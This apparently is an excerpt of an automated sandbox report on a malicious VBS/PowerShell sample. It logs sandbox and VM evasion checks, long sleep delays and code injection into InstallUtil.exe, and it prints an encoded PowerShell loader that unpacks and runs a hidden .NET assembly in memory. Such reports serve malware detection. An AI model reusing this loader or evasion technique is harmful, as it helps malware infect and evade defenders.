                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTR
                      Source: c:\users\user\desktop\rfq_43200046412000086500125.vbs.exeKey value queried: Powershell behaviorJump to behavior
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory allocated: 4D50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory allocated: 4D50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 990000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeWindow / User API: threadDelayed 4642Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeWindow / User API: threadDelayed 4993Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1435Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5345Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe TID: 7852Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -34000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33765s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33218s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -33000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -32890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -38000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -37110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36602s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36282s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36157s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -36047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -35938s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -35813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -35688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204Thread sleep time: -35563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33765Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33218Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 33000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 32890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 38000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36602Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36157Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000008.00000002.2080197076.0000000005350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: GosE0b7EhUSvmciTa1T
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2041344599.00000000089B0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2060466239.00000000007E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 602000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 65C000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 65E000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4FB008Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "c:\users\user\desktop\rfq_43200046412000086500125.vbs.exe" -enc jabbag4abwb2ahaadabzahmaaqbqacaapqagafsauwb5ahmadablag0algbeagkayqbnag4abwbzahqaaqbjahmalgbqahiabwbjaguacwbzaf0aoga6aecazqb0aemadqbyahiazqbuahqauabyag8aywblahmacwaoackalgbnageaaqbuae0abwbkahuabablac4argbpagwazqboageabqblac4augblahaababhagmazqaoaccalgblahgazqanacwajwanackaowakafaaygbzaheacaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeeabgbvahyacab0ahmacwbpagoaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabqagiacwbxahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaeyaeabnagoayqb0agiaeqbjagiaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafeaeqb5agkadab0ahcazgbiahyaiaapadsajabsagiabqb3aguaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0aowakafoaawbuagoabwbraheazqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabgahgazwbqageadabiahkaywbiacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabaagsabgbqag8aawbxagualgbdag8acab5afqabwaoacaajabsagiabqb3aguaiaapadsajabaagsabgbqag8aawbxagualgbdagwabwbzaguakaapadsajabgahgazwbqageadabiahkaywbiac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiaakafiaygbtahcazqauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqauqb5ahkaaqb0ahqadwbmagiadgapadsaiaakaeoaegbragwacgbvahmaiaa9acaawwbtahkacwb0aguabqauaeeacabwaeqabwbtageaaqbuaf0aoga6aemadqbyahiazqbuahqarabvag0ayqbpag4algbmag8ayqbkacgajabrahkaeqbpahqadab3agyaygb2ackaowagacqauqbtahiazwbjagqazqbqacaapqagacqasgb6agsababyag8acwauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafeabqbyagcaywbkaguaagauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqauqbtahiazwbjagqazqbqac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe "c:\users\user\desktop\rfq_43200046412000086500125.vbs.exe" -enc jabbag4abwb2ahaadabzahmaaqbqacaapqagafsauwb5ahmadablag0algbeagkayqbnag4abwbzahqaaqbjahmalgbqahiabwbjaguacwbzaf0aoga6aecazqb0aemadqbyahiazqbuahqauabyag8aywblahmacwaoackalgbnageaaqbuae0abwbkahuabablac4argbpagwazqboageabqblac4augblahaababhagmazqaoaccalgblahgazqanacwajwanackaowakafaaygbzaheacaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeeabgbvahyacab0ahmacwbpagoaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabqagiacwbxahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaeyaeabnagoayqb0agiaeqbjagiaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafeaeqb5agkadab0ahcazgbiahyaiaapadsajabsagiabqb3aguaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0aowakafoaawbuagoabwbraheazqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabgahgazwbqageadabiahkaywbiacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabaagsabgbqag8aawbxagualgbdag8acab5afqabwaoacaajabsagiabqb3aguaiaapadsajabaagsabgbqag8aawbxagualgbdagwabwbzaguakaapadsajabgahgazwbqageadabiahkaywbiac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqauqb5ahkaaqb0ahqadwbmagiadgagad0aiaakafiaygbtahcazqauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqauqb5ahkaaqb0ahqadwbmagiadgapadsaiaakaeoaegbragwacgbvahmaiaa9acaawwbtahkacwb0aguabqauaeeacabwaeqabwbtageaaqbuaf0aoga6aemadqbyahiazqbuahqarabvag0ayqbpag4algbmag8ayqbkacgajabrahkaeqbpahqadab3agyaygb2ackaowagacqauqbtahiazwbjagqazqbqacaapqagacqasgb6agsababyag8acwauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafeabqbyagcaywbkaguaagauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqauqbtahiazwbjagqazqbqac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
